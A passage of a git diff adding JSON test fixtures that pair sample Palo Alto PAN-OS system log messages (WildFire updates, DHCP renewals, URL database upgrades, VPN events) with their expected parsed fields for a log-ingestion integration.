+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:51.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Medium\",\"EventDescription\":\"Successfully registered to Public Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143102,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:51.387000Z\"}\n"
+  },
+  "expected": {
+    "message": "{\"LogTime\":\"2023-02-16T15:31:51.000000Z\",\"LogSourceID\":\"007954000351998\",\"LogType\":\"SYSTEM\",\"Subtype\":\"fb\",\"ConfigVersion\":\"10.1\",\"EventTime\":\"2023-02-16T15:31:51.000000Z\",\"VirtualLocation\":null,\"EventName\":\"wildfire-conn-success\",\"EventComponent\":\"\",\"VendorSeverity\":\"Medium\",\"EventDescription\":\"Successfully registered to Public Cloud wildfire.paloaltonetworks.com\",\"SequenceNo\":7200776623254143102,\"DGHierarchyLevel1\":0,\"DGHierarchyLevel2\":0,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":null,\"LogSourceName\":\"PA-VM\",\"DeviceGroup\":null,\"Template\":null,\"TimeGeneratedHighResolution\":\"2023-02-16T15:31:51.387000Z\"}\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "Successfully registered to Public Cloud wildfire.paloaltonetworks.com",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-16T15:31:51Z",
+    "action": {
+      "type": "fb"
+    },
+    "destination": {
+      "address": "wildfire.paloaltonetworks.com",
+      "domain": "wildfire.paloaltonetworks.com",
+      "registered_domain": "paloaltonetworks.com",
+      "subdomain": "wildfire",
+      "top_level_domain": "com"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Medium",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "fb"
+    },
+    "related": {
+      "hosts": [
+        "wildfire.paloaltonetworks.com"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system.json
new file mode 100644
index 000000000..2d21571e0
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system.json	
@@ -0,0 +1,41 @@
+{
+  "input": {
+    "message": "1,2024/01/12 22:47:26,016201000000,SYSTEM,vpn,2222,2024/01/12 22:47:27,,test-event,,0,0,general,informational,\"unknown test peer\",55555555555555555,0x0,0,0,0,0,,test-1,0,0,2024-01-12T22:47:27.652+11:00"
+  },
+  "expected": {
+    "message": "1,2024/01/12 22:47:26,016201000000,SYSTEM,vpn,2222,2024/01/12 22:47:27,,test-event,,0,0,general,informational,\"unknown test peer\",55555555555555555,0x0,0,0,0,0,,test-1,0,0,2024-01-12T22:47:27.652+11:00",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "unknown test peer",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-01-12T11:47:27.652000Z",
+    "action": {
+      "name": "test-event",
+      "type": "vpn"
+    },
+    "log": {
+      "hostname": "test-1",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "test-1",
+      "product": "PAN-OS",
+      "serial_number": "016201000000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "test-event",
+      "Threat_ContentType": "vpn"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
new file mode 100644
index 000000000..8a299b691
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json	
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:31:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:32:07.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170508,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:31:56.151000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:31:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:32:07.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170508,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:31:56.151000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Successfully connect to address: 5.6.7.8 port: 3978, conn id: triallr-5.6.7.8-2-def",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:31:56Z",
+    "action": {
+      "type": "general"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "port": 3978
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "ip": [
+        "5.6.7.8"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json
new file mode 100644
index 000000000..4b7dc612f
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"PAN-DB was upgraded to version 20230203.20250.\",\"EventName\": \"upgrade-url-database-success\",\"EventTime\": \"2023-02-03T16:37:22.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:37:31.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170511,\"Subtype\": \"url-filtering\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:37:22.476000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"PAN-DB was upgraded to version 20230203.20250.\",\"EventName\": \"upgrade-url-database-success\",\"EventTime\": \"2023-02-03T16:37:22.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:37:31.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170511,\"Subtype\": \"url-filtering\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:37:22.476000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "module": "PAN-DB",
+      "reason": "PAN-DB was upgraded to version 20230203.20250.",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:37:22Z",
+    "action": {
+      "type": "url-filtering"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "url-filtering"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json
new file mode 100644
index 000000000..7901b05ce
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json	
@@ -0,0 +1,56 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"EventName\": \"if-renew-trigger\",\"EventTime\": \"2023-02-03T16:39:46.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:39:55.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170512,\"Subtype\": \"dhcp\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:39:46.612000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": \"\",\"EventDescription\": \"DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1\",\"EventName\": \"if-renew-trigger\",\"EventTime\": \"2023-02-03T16:39:46.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:39:55.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170512,\"Subtype\": \"dhcp\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:39:46.612000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": null,\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "system",
+      "reason": "DHCP RENEW: interface eth0, ip 1.2.3.4 netmask 255.255.255.0 dhcp server: 1.2.3.1",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:39:46Z",
+    "action": {
+      "type": "dhcp"
+    },
+    "destination": {
+      "address": "1.2.3.1"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "ingress": {
+        "interface": {
+          "name": "eth0"
+        }
+      },
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "dhcp"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json
new file mode 100644
index 000000000..30a9a9970
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json	
@@ -0,0 +1,43 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:30:44.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:30:52.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170505,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:30:44.868000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:30:44.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:30:52.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170505,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:30:44.868000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "Installed WildFire package: panupv3-all-wildfire-739610-742990.tgz",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:30:44Z",
+    "action": {
+      "type": "general"
+    },
+    "file": {
+      "name": "panupv3-all-wildfire-739610-742990.tgz"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json
new file mode 100644
index 000000000..f74ff5a47
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire update job succeeded  for user Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:46:05.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170521,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:56.725000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire update job succeeded  for user Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:56.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:46:05.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170521,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:56.725000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "WildFire update job succeeded  for user Auto update agent",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:56Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json
new file mode 100644
index 000000000..8c122fc65
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json	
@@ -0,0 +1,48 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server:  completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:51.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170515,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:51.118000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server:  completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:51.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170515,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:51.118000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Connection to Update server:  completed successfully, initiated by 1.2.3.4",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:51Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json
new file mode 100644
index 000000000..524aef010
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72.   \",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170518,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.888000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72.   \",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170518,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.888000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "WildFire job started processing. Dequeue time=2023/02/03 17:45:52. Job Id=72.   ",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:52Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json
new file mode 100644
index 000000000..f305c2d3e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:55.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170520,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:55.982000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:55.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170520,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:55.982000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "WildFire package upgraded from version 739610-742990 to 739613-742993 by Auto update agent",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:55Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json
new file mode 100644
index 000000000..63f3bd258
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72.  . Type: Full\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170517,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72.  . Type: Full\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170517,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "WildFire job enqueued. Enqueue time=2023/02/03 17:45:52. JobId=72.  . Type: Full",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:52Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
